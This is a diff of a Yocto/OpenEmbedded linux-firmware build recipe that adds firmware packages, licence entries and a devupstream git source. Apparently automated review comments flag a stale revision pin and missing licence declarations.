file://LICENCE.ti-connectivity;md5=c5e02be633f1499c109d1652514d85ec \
file://LICENCE.ti-keystone;md5=3a86335d32864b0bef996bee26cc0f2c \
file://LICENCE.ueagle-atm4-firmware;md5=4ed7ea6b507ccc583b9d594417714118 \
@@ -126,8 +130,11 @@ LIC_FILES_CHKSUM = "file://LICENCE.Abilis;md5=b5ee3f410780e56711ad48eadc22b8bc \
file://LICENCE.xc4000;md5=0ff51d2dc49fce04814c9155081092f0 \
file://LICENCE.xc5000;md5=1e170c13175323c32c7f4d0998d53f66 \
file://LICENCE.xc5000c;md5=12b02efa3049db65d524aeb418dd87ca \
- file://WHENCE;md5=daf28db5d6353de0a886f08106cffa22 \
+ file://WHENCE;md5=${WHENCE_CHKSUM} \
"
+# WHENCE checksum is defined separately to ease overriding it if
+# class-devupstream is selected.
+WHENCE_CHKSUM = "a344e6c28970fc7daafa81c10247aeb6"
# These are not common licenses, set NO_GENERIC_LICENSE for them
# so that the license files will be copied from fetched source
@@ -153,7 +160,6 @@ NO_GENERIC_LICENSE[Firmware-fw_sst_0f28] = "LICENCE.fw_sst_0f28"
NO_GENERIC_LICENSE[Firmware-go7007] = "LICENCE.go7007"
NO_GENERIC_LICENSE[Firmware-GPLv2] = "GPL-2"
NO_GENERIC_LICENSE[Firmware-hfi1_firmware] = "LICENSE.hfi1_firmware"
-NO_GENERIC_LICENSE[Firmware-i2400m] = "LICENCE.i2400m"
NO_GENERIC_LICENSE[Firmware-i915] = "LICENSE.i915"
NO_GENERIC_LICENSE[Firmware-ibt_firmware] = "LICENCE.ibt_firmware"
NO_GENERIC_LICENSE[Firmware-ice] = "LICENSE.ice"
@@ -161,6 +167,7 @@ NO_GENERIC_LICENSE[Firmware-IntcSST2] = "LICENCE.IntcSST2"
NO_GENERIC_LICENSE[Firmware-it913x] = "LICENCE.it913x"
NO_GENERIC_LICENSE[Firmware-iwlwifi_firmware] = "LICENCE.iwlwifi_firmware"
NO_GENERIC_LICENSE[Firmware-kaweth] = "LICENCE.kaweth"
+NO_GENERIC_LICENSE[Firmware-Lontium] = "LICENSE.Lontium"
NO_GENERIC_LICENSE[Firmware-Marvell] = "LICENCE.Marvell"
NO_GENERIC_LICENSE[Firmware-mediatek] = "LICENCE.mediatek"
NO_GENERIC_LICENSE[Firmware-moxa] = "LICENCE.moxa"
@@ -172,6 +179,7 @@ NO_GENERIC_LICENSE[Firmware-ath9k-htc] = "LICENCE.open-ath9k-htc-firmware"
NO_GENERIC_LICENSE[Firmware-phanfw] = "LICENCE.phanfw"
NO_GENERIC_LICENSE[Firmware-qat] = "LICENCE.qat_firmware"
NO_GENERIC_LICENSE[Firmware-qcom] = "LICENSE.qcom"
+NO_GENERIC_LICENSE[Firmware-qcom-yamato] = "LICENSE.qcom_yamato"
NO_GENERIC_LICENSE[Firmware-qla1280] = "LICENCE.qla1280"
NO_GENERIC_LICENSE[Firmware-qla2xxx] = "LICENCE.qla2xxx"
NO_GENERIC_LICENSE[Firmware-qualcommAthos_ar3k] = "LICENSE.QualcommAtheros_ar3k"
@@ -183,7 +191,6 @@ NO_GENERIC_LICENSE[Firmware-ralink-firmware] = "LICENCE.ralink-firmware.txt"
NO_GENERIC_LICENSE[Firmware-rtlwifi_firmware] = "LICENCE.rtlwifi_firmware.txt"
NO_GENERIC_LICENSE[Firmware-siano] = "LICENCE.siano"
NO_GENERIC_LICENSE[Firmware-imx-sdma_firmware] = "LICENSE.sdma_firmware"
-NO_GENERIC_LICENSE[Firmware-tda7706-firmware] = "LICENCE.tda7706-firmware.txt"
NO_GENERIC_LICENSE[Firmware-ti-connectivity] = "LICENCE.ti-connectivity"
NO_GENERIC_LICENSE[Firmware-ti-keystone] = "LICENCE.ti-keystone"
NO_GENERIC_LICENSE[Firmware-ueagle-atm4-firmware] = "LICENCE.ueagle-atm4-firmware"
@@ -196,9 +203,16 @@ NO_GENERIC_LICENSE[WHENCE] = "WHENCE"
PE = "1"
-SRC_URI = "${KERNELORG_MIRROR}/linux/kernel/firmware/${BPN}-${PV}.tar.xz"
+SRC_URI = "\
+ ${KERNELORG_MIRROR}/linux/kernel/firmware/${BPN}-${PV}.tar.xz \
+"
+
+BBCLASSEXTEND = "devupstream:target"
+SRC_URI:class-devupstream = "git://git.kernel.org/pub/scm/linux/kernel/git/firmware/linux-firmware.git;protocol=https;branch=main"
+# Pin this to the 20220509 release, override this in local.conf
+SRCREV:class-devupstream ?= "b19cbdca78ab2adfd210c91be15a22568e8b8cae"
-SRC_URI[sha256sum] = "bf586e0beb4c65f22bf0a79811f259aa0a5a7cc9f70eebecb260525b6914cef7"
+SRC_URI[sha256sum] = "bf0f239dc0801e9d6bf5d5fb3e2f549575632cf4688f4348184199cb02c2bcd7"
inherit allarch
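Review bot: The comment on `SRCREV:class-devupstream` says the revision is pinned to the 20220509 release, while this recipe is now linux-firmware_20240220.bb with a new tarball `sha256sum`. Selecting the devupstream variant would therefore build firmware about two years older than the tarball, and the `LIC_FILES_CHKSUM`/`WHENCE_CHKSUM` values updated for 20240220 would presumably not match that tree. Either move the pin to the commit for the 20240220 tag or correct the comment and say which checksums need overriding. Separately, these two lines use the `:` override syntax while the rest of the recipe uses `_` (`FILES_${PN}-…`, `RDEPENDS_${PN}-…`); confirm that the bitbake version on this branch applies `:class-devupstream` as an override.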
@@ -209,7 +223,8 @@ do_compile() {
}
do_install() {
- oe_runmake 'DESTDIR=${D}' 'FIRMWAREDIR=${nonarch_base_libdir}/firmware' install
+ # install-nodedup avoids rdfind dependency
+ oe_runmake 'DESTDIR=${D}' 'FIRMWAREDIR=${nonarch_base_libdir}/firmware' install-nodedup
cp GPL-2 LICEN[CS]E.* WHENCE ${D}${nonarch_base_libdir}/firmware/
}
@@ -222,8 +237,10 @@ PACKAGES =+ "${PN}-ralink-license ${PN}-ralink \
${PN}-sd8887 ${PN}-sd8897 ${PN}-sd8997 ${PN}-usb8997 \
${PN}-ti-connectivity-license ${PN}-wlcommon ${PN}-wl12xx ${PN}-wl18xx \
${PN}-vt6656-license ${PN}-vt6656 \
+ ${PN}-rs9113 ${PN}-rs9116 \
${PN}-rtl-license ${PN}-rtl8188 ${PN}-rtl8192cu ${PN}-rtl8192ce ${PN}-rtl8192su ${PN}-rtl8723 ${PN}-rtl8821 \
${PN}-rtl8168 \
+ ${PN}-rtl8822 \
${PN}-cypress-license \
${PN}-broadcom-license \
${PN}-bcm-0bb4-0306 \
@@ -261,7 +278,7 @@ PACKAGES =+ "${PN}-ralink-license ${PN}-ralink \
${PN}-bcm43xx-hdr \
${PN}-atheros-license ${PN}-ar9170 ${PN}-ath6k ${PN}-ath9k \
${PN}-gplv2-license ${PN}-carl9170 \
- ${PN}-ar3k-license ${PN}-ar3k ${PN}-ath10k-license ${PN}-ath10k ${PN}-qca \
+ ${PN}-ar3k-license ${PN}-ar3k ${PN}-ath10k-license ${PN}-ath10k ${PN}-ath11k ${PN}-qca \
\
${PN}-imx-sdma-license ${PN}-imx-sdma-imx6q ${PN}-imx-sdma-imx7d \
\
@@ -293,11 +310,22 @@ PACKAGES =+ "${PN}-ralink-license ${PN}-ralink \
${PN}-nvidia-gpu \
${PN}-netronome-license ${PN}-netronome \
${PN}-qat ${PN}-qat-license \
- ${PN}-qcom-license \
+ ${PN}-qcom-license ${PN}-qcom-yamato-license \
${PN}-qcom-venus-1.8 ${PN}-qcom-venus-4.2 ${PN}-qcom-venus-5.2 ${PN}-qcom-venus-5.4 \
- ${PN}-qcom-adreno-a3xx ${PN}-qcom-adreno-a530 ${PN}-qcom-adreno-a630 \
- ${PN}-qcom-sdm845-audio ${PN}-qcom-sdm845-compute ${PN}-qcom-sdm845-modem \
+ ${PN}-qcom-vpu-1.0 ${PN}-qcom-vpu-2.0 \
+ ${PN}-qcom-adreno-a2xx ${PN}-qcom-adreno-a3xx ${PN}-qcom-adreno-a4xx ${PN}-qcom-adreno-a530 \
+ ${PN}-qcom-adreno-a630 ${PN}-qcom-adreno-a650 ${PN}-qcom-adreno-a660 \
+ ${PN}-qcom-apq8016-modem ${PN}-qcom-apq8016-wifi \
+ ${PN}-qcom-apq8096-adreno ${PN}-qcom-apq8096-audio ${PN}-qcom-apq8096-modem \
+ ${PN}-qcom-sc8280xp-lenovo-x13s-compat \
+ ${PN}-qcom-sc8280xp-lenovo-x13s-audio \
+ ${PN}-qcom-sc8280xp-lenovo-x13s-adreno \
+ ${PN}-qcom-sc8280xp-lenovo-x13s-compute \
+ ${PN}-qcom-sc8280xp-lenovo-x13s-sensors \
+ ${PN}-qcom-sdm845-adreno ${PN}-qcom-sdm845-audio ${PN}-qcom-sdm845-compute ${PN}-qcom-sdm845-modem \
+ ${PN}-qcom-sm8250-adreno ${PN}-qcom-sm8250-audio ${PN}-qcom-sm8250-compute \
${PN}-amlogic-vdec-license ${PN}-amlogic-vdec \
+ ${PN}-lt9611uxc ${PN}-lontium-license \
${PN}-whence-license \
${PN}-license \
"
@@ -340,7 +368,7 @@ FILES_${PN}-carl9170 = " \
RDEPENDS_${PN}-carl9170 += "${PN}-gplv2-license"
# For QualCommAthos
-LICENSE_${PN}-ar3k = "Firmware-qualcommAthos_ar3k"
+LICENSE_${PN}-ar3k = "Firmware-qualcommAthos_ar3k & Firmware-atheros_firmware"
LICENSE_${PN}-ar3k-license = "Firmware-qualcommAthos_ar3k"
LICENSE_${PN}-ath10k = "Firmware-qualcommAthos_ath10k"
LICENSE_${PN}-ath10k-license = "Firmware-qualcommAthos_ath10k"
@@ -356,12 +384,17 @@ FILES_${PN}-ath10k = " \
${nonarch_base_libdir}/firmware/ath10k \
"
+FILES_${PN}-ath11k = " \
+ ${nonarch_base_libdir}/firmware/ath11k \
+"
+
FILES_${PN}-qca = " \
${nonarch_base_libdir}/firmware/qca \
"
-RDEPENDS_${PN}-ar3k += "${PN}-ar3k-license"
+RDEPENDS_${PN}-ar3k += "${PN}-ar3k-license ${PN}-atheros-license"
RDEPENDS_${PN}-ath10k += "${PN}-ath10k-license"
+RDEPENDS_${PN}-ath11k += "${PN}-ath10k-license"
RDEPENDS_${PN}-qca += "${PN}-ath10k-license"
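Review bot: `${PN}-ath11k` gets `FILES_` and an `RDEPENDS_` on `${PN}-ath10k-license`, but neither this hunk nor the preceding one adds a `LICENSE_${PN}-ath11k`, unlike the ar3k and ath10k packages beside it. Unless it is set elsewhere in the recipe, the package would fall back to the recipe-wide `LICENSE` expression in its metadata. Adding `LICENSE_${PN}-ath11k = "Firmware-qualcommAthos_ath10k"` next to the ath10k entries would keep the per-package licence accurate for licence manifests.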
# For ralink
@@ -381,7 +414,7 @@ LICENSE_${PN}-mt7601u-license = "Firmware-ralink_a_mediatek_company_firmware"
FILES_${PN}-mt7601u-license = "${nonarch_base_libdir}/firmware/LICENCE.ralink_a_mediatek_company_firmware"
FILES_${PN}-mt7601u = " \
- ${nonarch_base_libdir}/firmware/mt7601u.bin \
+ ${nonarch_base_libdir}/firmware/mediatek/mt7601u.bin \
"
RDEPENDS_${PN}-mt7601u += "${PN}-mt7601u-license"
@@ -397,6 +430,12 @@ FILES_${PN}-radeon = " \
RDEPENDS_${PN}-radeon += "${PN}-radeon-license"
+# For lontium
+LICENSE_${PN}-lt9611uxc = "Firmware-Lontium"
+
+FILES_${PN}-lontium-license = "${nonarch_base_libdir}/firmware/LICENSE.Lontium"
+FILES_${PN}-lt9611uxc = "${nonarch_base_libdir}/firmware/lt9611uxc_fw.bin"
+
# For marvell
LICENSE_${PN}-pcie8897 = "Firmware-Marvell"
LICENSE_${PN}-pcie8997 = "Firmware-Marvell"
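Review bot: The new lontium block sets `LICENSE_${PN}-lt9611uxc` and defines the `${PN}-lontium-license` package, but it has no `RDEPENDS_${PN}-lt9611uxc += "${PN}-lontium-license"`. Every comparable firmware package in this diff, such as rs9113, rtl8822 and ath11k, pulls in its licence package that way. Without it, an image that installs `${PN}-lt9611uxc` would ship the firmware blob without `LICENSE.Lontium`, unless the dependency is declared outside this hunk. A `LICENSE_${PN}-lontium-license = "Firmware-Lontium"` line would also match how the other `-license` packages are declared.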
@@ -477,6 +516,13 @@ FILES_${PN}-netronome = " \
${nonarch_base_libdir}/firmware/netronome/nic_AMDA0096*.nffw \
${nonarch_base_libdir}/firmware/netronome/nic_AMDA0097*.nffw \
${nonarch_base_libdir}/firmware/netronome/nic_AMDA0099*.nffw \
+ ${nonarch_base_libdir}/firmware/netronome/nic_AMDA0058-0011_2x40.nffw \
+ ${nonarch_base_libdir}/firmware/netronome/nic_AMDA0058-0012_2x40.nffw \
+ ${nonarch_base_libdir}/firmware/netronome/nic_AMDA0078-0011_1x100.nffw \
+ ${nonarch_base_libdir}/firmware/netronome/bpf \
+ ${nonarch_base_libdir}/firmware/netronome/flower \
+ ${nonarch_base_libdir}/firmware/netronome/nic \
+ ${nonarch_base_libdir}/firmware/netronome/nic-sriov \
"
RDEPENDS_${PN}-netronome += "${PN}-netronome-license"
@@ -501,6 +547,17 @@ FILES_${PN}-nvidia-license = "${nonarch_base_libdir}/firmware/LICENCE.nvidia"
RDEPENDS_${PN}-nvidia-gpu += "${PN}-nvidia-license"
RDEPENDS_${PN}-nvidia-tegra += "${PN}-nvidia-license"
+RDEPENDS_${PN}-nvidia-tegra-k1 += "${PN}-nvidia-license"
+
+# For RSI RS911x WiFi
+LICENSE_${PN}-rs9113 = "WHENCE"
+LICENSE_${PN}-rs9116 = "WHENCE"
+
+FILES_${PN}-rs9113 = " ${nonarch_base_libdir}/firmware/rsi/rs9113*.rps "
+FILES_${PN}-rs9116 = " ${nonarch_base_libdir}/firmware/rsi/rs9116*.rps "
+
+RDEPENDS_${PN}-rs9113 += "${PN}-whence-license"
+RDEPENDS_${PN}-rs9116 += "${PN}-whence-license"
# For rtl
LICENSE_${PN}-rtl8188 = "Firmware-rtlwifi_firmware"
@@ -509,6 +566,7 @@ LICENSE_${PN}-rtl8192ce = "Firmware-rtlwifi_firmware"
LICENSE_${PN}-rtl8192su = "Firmware-rtlwifi_firmware"
LICENSE_${PN}-rtl8723 = "Firmware-rtlwifi_firmware"
LICENSE_${PN}-rtl8821 = "Firmware-rtlwifi_firmware"
+LICENSE_${PN}-rtl8822 = "Firmware-rtlwifi_firmware"
LICENSE_${PN}-rtl-license = "Firmware-rtlwifi_firmware"
LICENSE_${PN}-rtl8168 = "WHENCE"
@@ -536,6 +594,11 @@ FILES_${PN}-rtl8821 = " \
FILES_${PN}-rtl8168 = " \
${nonarch_base_libdir}/firmware/rtl_nic/rtl8168*.fw \
"
+FILES_${PN}-rtl8822 = " \
+ ${nonarch_base_libdir}/firmware/rtl_bt/rtl8822*.bin \
+ ${nonarch_base_libdir}/firmware/rtw88/rtw8822*.bin \
+ ${nonarch_base_libdir}/firmware/rtlwifi/rtl8822*.bin \
+"
RDEPENDS_${PN}-rtl8188 += "${PN}-rtl-license"
RDEPENDS_${PN}-rtl8192ce += "${PN}-rtl-license"
@@ -543,6 +606,7 @@ RDEPENDS_${PN}-rtl8192cu += "${PN}-rtl-license"
RDEPENDS_${PN}-rtl8192su = "${PN}-rtl-license"
RDEPENDS_${PN}-rtl8723 += "${PN}-rtl-license"
RDEPENDS_${PN}-rtl8821 += "${PN}-rtl-license"
+RDEPENDS_${PN}-rtl8822 += "${PN}-rtl-license"
RDEPENDS_${PN}-rtl8168 += "${PN}-whence-license"
# For ti-connectivity
@@ -602,7 +666,9 @@ FILES_${PN}-bcm4329 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4329-sdio.bi
FILES_${PN}-bcm4330 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4330-sdio.*"
FILES_${PN}-bcm4334 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4334-sdio.bin"
FILES_${PN}-bcm4335 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4335-sdio.bin"
-FILES_${PN}-bcm4339 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4339-sdio.bin"
+FILES_${PN}-bcm4339 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4339-sdio.bin \
+ ${nonarch_base_libdir}/firmware/cypress/cyfmac4339-sdio.bin \
+"
FILES_${PN}-bcm43241b0 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43241b0-sdio.bin"
FILES_${PN}-bcm43241b4 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43241b4-sdio.bin"
FILES_${PN}-bcm43241b5 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43241b5-sdio.bin"
@@ -611,12 +677,18 @@ FILES_${PN}-bcm43143 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43143.bin \
${nonarch_base_libdir}/firmware/brcm/brcmfmac43143-sdio.bin \
"
FILES_${PN}-bcm43430a0 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43430a0-sdio.*"
-FILES_${PN}-bcm43455 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43455-sdio.*"
+FILES_${PN}-bcm43455 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43455-sdio.* \
+ ${nonarch_base_libdir}/firmware/cypress/cyfmac43455-sdio.* \
+"
FILES_${PN}-bcm4350c2 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4350c2-pcie.bin"
FILES_${PN}-bcm4350 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4350-pcie.bin"
-FILES_${PN}-bcm4356 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4356-sdio.bin"
+FILES_${PN}-bcm4356 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4356-sdio.* \
+ ${nonarch_base_libdir}/firmware/cypress/cyfmac4356-sdio.* \
+"
FILES_${PN}-bcm43569 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43569.bin"
-FILES_${PN}-bcm43570 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43570-pcie.bin"
+FILES_${PN}-bcm43570 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43570-pcie.bin \
+ ${nonarch_base_libdir}/firmware/cypress/cyfmac43570-pcie.bin \
+"
FILES_${PN}-bcm4358 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4358-pcie.bin"
FILES_${PN}-bcm43602 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43602-pcie.bin \
${nonarch_base_libdir}/firmware/brcm/brcmfmac43602-pcie.ap.bin \
@@ -687,13 +759,22 @@ LICENSE_${PN}-cypress-license = "Firmware-cypress"
FILES_${PN}-cypress-license = "${nonarch_base_libdir}/firmware/LICENCE.cypress"
FILES_${PN}-bcm-0bb4-0306 = "${nonarch_base_libdir}/firmware/brcm/BCM-0bb4-0306.hcd"
-FILES_${PN}-bcm43340 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43340-sdio.*"
-FILES_${PN}-bcm43362 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43362-sdio.*"
-FILES_${PN}-bcm43430 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43430-sdio.*"
-FILES_${PN}-bcm4354 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4354-sdio.bin"
-FILES_${PN}-bcm4356-pcie = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4356-pcie.*"
+FILES_${PN}-bcm43340 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43340-sdio.* \
+ ${nonarch_base_libdir}/firmware/cypress/cyfmac43340-sdio.*"
+FILES_${PN}-bcm43362 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43362-sdio.* \
+ ${nonarch_base_libdir}/firmware/cypress/cyfmac43362-sdio.*"
+FILES_${PN}-bcm43430 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43430-sdio.* \
+ ${nonarch_base_libdir}/firmware/cypress/cyfmac43430-sdio.*"
+FILES_${PN}-bcm4354 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4354-sdio.bin \
+ ${nonarch_base_libdir}/firmware/cypress/cyfmac4354-sdio.bin \
+"
+FILES_${PN}-bcm4356-pcie = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4356-pcie.* \
+ ${nonarch_base_libdir}/firmware/cypress/cyfmac4356-pcie.* \
+"
FILES_${PN}-bcm4373 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4373-sdio.bin \
${nonarch_base_libdir}/firmware/brcm/brcmfmac4373.bin \
+ ${nonarch_base_libdir}/firmware/cypress/cyfmac4373-sdio.bin \
+ ${nonarch_base_libdir}/firmware/brcm/brcmfmac4373-sdio.clm_blob \
"
LICENSE_${PN}-bcm-0bb4-0306 = "Firmware-cypress"
@@ -893,27 +974,100 @@ RDEPENDS_${PN}-qat = "${PN}-qat-license"
# For QCOM VPU/GPU and SDM845
LICENSE_${PN}-qcom-license = "Firmware-qcom"
+LICENSE_${PN}-qcom-yamato-license = "Firmware-qcom-yamato"
+LICENSE_${PN}-qcom-venus-1.8 = "Firmware-qcom"
+LICENSE_${PN}-qcom-venus-4.2 = "Firmware-qcom"
+LICENSE_${PN}-qcom-venus-5.2 = "Firmware-qcom"
+LICENSE_${PN}-qcom-venus-5.4 = "Firmware-qcom"
+LICENSE_${PN}-qcom-vpu-1.0 = "Firmware-qcom"
+LICENSE_${PN}-qcom-vpu-2.0 = "Firmware-qcom"
+LICENSE_${PN}-qcom-adreno-a2xx = "Firmware-qcom Firmware-qcom-yamato"
+LICENSE_${PN}-qcom-adreno-a3xx = "Firmware-qcom"
+LICENSE_${PN}-qcom-adreno-a4xx = "Firmware-qcom"
+LICENSE_${PN}-qcom-adreno-a530 = "Firmware-qcom"
+LICENSE_${PN}-qcom-adreno-a630 = "Firmware-qcom"
+LICENSE_${PN}-qcom-adreno-a650 = "Firmware-qcom"
+LICENSE_${PN}-qcom-adreno-a660 = "Firmware-qcom"
+LICENSE_${PN}-qcom-apq8016-modem = "Firmware-qcom"
+LICENSE_${PN}-qcom-apq8016-wifi = "Firmware-qcom"
+LICENSE_${PN}-qcom-apq8096-audio = "Firmware-qcom"
+LICENSE_${PN}-qcom-apq8096-adreno = "Firmware-qcom"
+LICENSE_${PN}-qcom-apq8096-modem = "Firmware-qcom"
+LICENSE_${PN}-qcom-sc8280xp-lenovo-x13s-audio = "Firmware-qcom"
+LICENSE_${PN}-qcom-sc8280xp-lenovo-x13s-adreno = "Firmware-qcom"
+LICENSE_${PN}-qcom-sc8280xp-lenovo-x13s-compute = "Firmware-qcom"
+LICENSE_${PN}-qcom-sc8280xp-lenovo-x13s-sensors = "Firmware-qcom"
+LICENSE_${PN}-qcom-sdm845-audio = "Firmware-qcom"
+LICENSE_${PN}-qcom-sdm845-adreno = "Firmware-qcom"
+LICENSE_${PN}-qcom-sdm845-compute = "Firmware-qcom"
+LICENSE_${PN}-qcom-sdm845-modem = "Firmware-qcom"
+LICENSE_${PN}-qcom-sm8250-audio = "Firmware-qcom"
+LICENSE_${PN}-qcom-sm8250-adreno = "Firmware-qcom"
+LICENSE_${PN}-qcom-sm8250-compute = "Firmware-qcom"
+
FILES_${PN}-qcom-license = "${nonarch_base_libdir}/firmware/LICENSE.qcom ${nonarch_base_libdir}/firmware/qcom/NOTICE.txt"
+FILES_${PN}-qcom-yamato-license = "${nonarch_base_libdir}/firmware/LICENSE.qcom_yamato"
FILES_${PN}-qcom-venus-1.8 = "${nonarch_base_libdir}/firmware/qcom/venus-1.8/*"
FILES_${PN}-qcom-venus-4.2 = "${nonarch_base_libdir}/firmware/qcom/venus-4.2/*"
FILES_${PN}-qcom-venus-5.2 = "${nonarch_base_libdir}/firmware/qcom/venus-5.2/*"
FILES_${PN}-qcom-venus-5.4 = "${nonarch_base_libdir}/firmware/qcom/venus-5.4/*"
-FILES_${PN}-qcom-adreno-a3xx = "${nonarch_base_libdir}/firmware/qcom/a300_*.fw ${nonarch_base_libdir}/firmware/a300_*.fw"
-FILES_${PN}-qcom-adreno-a530 = "${nonarch_base_libdir}/firmware/qcom/a530*.*"
-FILES_${PN}-qcom-adreno-a630 = "${nonarch_base_libdir}/firmware/qcom/a630*.* ${nonarch_base_libdir}/firmware/qcom/sdm845/a630*.*"
+FILES_${PN}-qcom-vpu-1.0 = "${nonarch_base_libdir}/firmware/qcom/vpu-1.0/*"
+FILES_${PN}-qcom-vpu-2.0 = "${nonarch_base_libdir}/firmware/qcom/vpu-2.0/*"
+FILES_${PN}-qcom-adreno-a2xx = "${nonarch_base_libdir}/firmware/qcom/leia_*.fw ${nonarch_base_libdir}/firmware/qcom/yamato_*.fw"
+FILES_${PN}-qcom-adreno-a3xx = "${nonarch_base_libdir}/firmware/qcom/a3*_*.fw ${nonarch_base_libdir}/firmware/a300_*.fw"
+FILES_${PN}-qcom-adreno-a4xx = "${nonarch_base_libdir}/firmware/qcom/a4*_*.fw"
+FILES_${PN}-qcom-adreno-a530 = "${nonarch_base_libdir}/firmware/qcom/a530*.fw*"
+FILES_${PN}-qcom-adreno-a630 = "${nonarch_base_libdir}/firmware/qcom/a630*.*"
+FILES_${PN}-qcom-adreno-a650 = "${nonarch_base_libdir}/firmware/qcom/a650*.*"
+FILES_${PN}-qcom-adreno-a660 = "${nonarch_base_libdir}/firmware/qcom/a660*.*"
+FILES_${PN}-qcom-apq8016-modem = "${nonarch_base_libdir}/firmware/qcom/apq8016/mba.mbn ${nonarch_base_libdir}/firmware/qcom/apq8016/modem.mbn"
+FILES_${PN}-qcom-apq8016-wifi = "${nonarch_base_libdir}/firmware/qcom/apq8016/wcnss.mbn ${nonarch_base_libdir}/firmware/qcom/apq8016/WCNSS*"
+FILES_${PN}-qcom-apq8096-adreno = "${nonarch_base_libdir}/firmware/qcom/apq8096/a530_zap.mbn ${nonarch_base_libdir}/firmware/qcom/a530_zap.mdt"
+FILES_${PN}-qcom-apq8096-audio = "${nonarch_base_libdir}/firmware/qcom/apq8096/adsp*.*"
+FILES_${PN}-qcom-apq8096-modem = "${nonarch_base_libdir}/firmware/qcom/apq8096/mba.mbn ${nonarch_base_libdir}/firmware/qcom/apq8096/modem*.* ${nonarch_base_libdir}/firmware/qcom/apq8096/wlanmdsp.mbn"
+FILES_${PN}-qcom-sc8280xp-lenovo-x13s-compat = "${nonarch_base_libdir}/firmware/qcom/LENOVO/21BX"
+FILES_${PN}-qcom-sc8280xp-lenovo-x13s-audio = "${nonarch_base_libdir}/firmware/qcom/sc8280xp/LENOVO/21BX/*adsp*.* ${nonarch_base_libdir}/firmware/qcom/sc8280xp/LENOVO/21BX/battmgr.jsn"
+FILES_${PN}-qcom-sc8280xp-lenovo-x13s-adreno = "${nonarch_base_libdir}/firmware/qcom/sc8280xp/LENOVO/21BX/qcdxkmsuc8280.mbn"
+FILES_${PN}-qcom-sc8280xp-lenovo-x13s-compute = "${nonarch_base_libdir}/firmware/qcom/sc8280xp/LENOVO/21BX/*cdsp*.*"
+FILES_${PN}-qcom-sc8280xp-lenovo-x13s-sensors = "${nonarch_base_libdir}/firmware/qcom/sc8280xp/LENOVO/21BX/*slpi*.*"
+FILES_${PN}-qcom-sdm845-adreno = "${nonarch_base_libdir}/firmware/qcom/sdm845/a630*.*"
FILES_${PN}-qcom-sdm845-audio = "${nonarch_base_libdir}/firmware/qcom/sdm845/adsp*.*"
FILES_${PN}-qcom-sdm845-compute = "${nonarch_base_libdir}/firmware/qcom/sdm845/cdsp*.*"
FILES_${PN}-qcom-sdm845-modem = "${nonarch_base_libdir}/firmware/qcom/sdm845/mba.mbn ${nonarch_base_libdir}/firmware/qcom/sdm845/modem*.* ${nonarch_base_libdir}/firmware/qcom/sdm845/wlanmdsp.mbn"
+FILES_${PN}-qcom-sm8250-adreno = "${nonarch_base_libdir}/firmware/qcom/sm8250/a650*.*"
+FILES_${PN}-qcom-sm8250-audio = "${nonarch_base_libdir}/firmware/qcom/sm8250/adsp*.*"
+FILES_${PN}-qcom-sm8250-compute = "${nonarch_base_libdir}/firmware/qcom/sm8250/cdsp*.*"
RDEPENDS_${PN}-qcom-venus-1.8 = "${PN}-qcom-license"
RDEPENDS_${PN}-qcom-venus-4.2 = "${PN}-qcom-license"
RDEPENDS_${PN}-qcom-venus-5.2 = "${PN}-qcom-license"
RDEPENDS_${PN}-qcom-venus-5.4 = "${PN}-qcom-license"
-RDEPENDS_${PN}-qcom-adreno-a3xx = "${PN}-qcom-license"
+RDEPENDS_${PN}-qcom-vpu-1.0 = "${PN}-qcom-license"
+RDEPENDS_${PN}-qcom-vpu-2.0 = "${PN}-qcom-license"
+RDEPENDS_${PN}-qcom-adreno-a2xx = "${PN}-qcom-license"
+RDEPENDS_${PN}-qcom-adreno-a2xx = "${PN}-qcom-license ${PN}-qcom-yamato-license"
+RDEPENDS_${PN}-qcom-adreno-a4xx = "${PN}-qcom-license"
RDEPENDS_${PN}-qcom-adreno-a530 = "${PN}-qcom-license"
RDEPENDS_${PN}-qcom-adreno-a630 = "${PN}-qcom-license"
+RDEPENDS_${PN}-qcom-adreno-a650 = "${PN}-qcom-license"
+RDEPENDS_${PN}-qcom-adreno-a660 = "${PN}-qcom-license"
+RDEPENDS_${PN}-qcom-apq8016-modem = "${PN}-qcom-license"
+RDEPENDS_${PN}-qcom-apq8016-wifi = "${PN}-qcom-license"
+RDEPENDS_${PN}-qcom-apq8096-audio = "${PN}-qcom-license"
+RDEPENDS_${PN}-qcom-apq8096-modem = "${PN}-qcom-license"
+RDEPENDS_${PN}-qcom-sc8280xp-lenovo-x13s-audio = "${PN}-qcom-license"
+RDEPENDS_${PN}-qcom-sc8280xp-lenovo-x13s-adreno = "${PN}-qcom-license"
+RDEPENDS_${PN}-qcom-sc8280xp-lenovo-x13s-compute = "${PN}-qcom-license"
+RDEPENDS_${PN}-qcom-sc8280xp-lenovo-x13s-sensors = "${PN}-qcom-license"
RDEPENDS_${PN}-qcom-sdm845-audio = "${PN}-qcom-license"
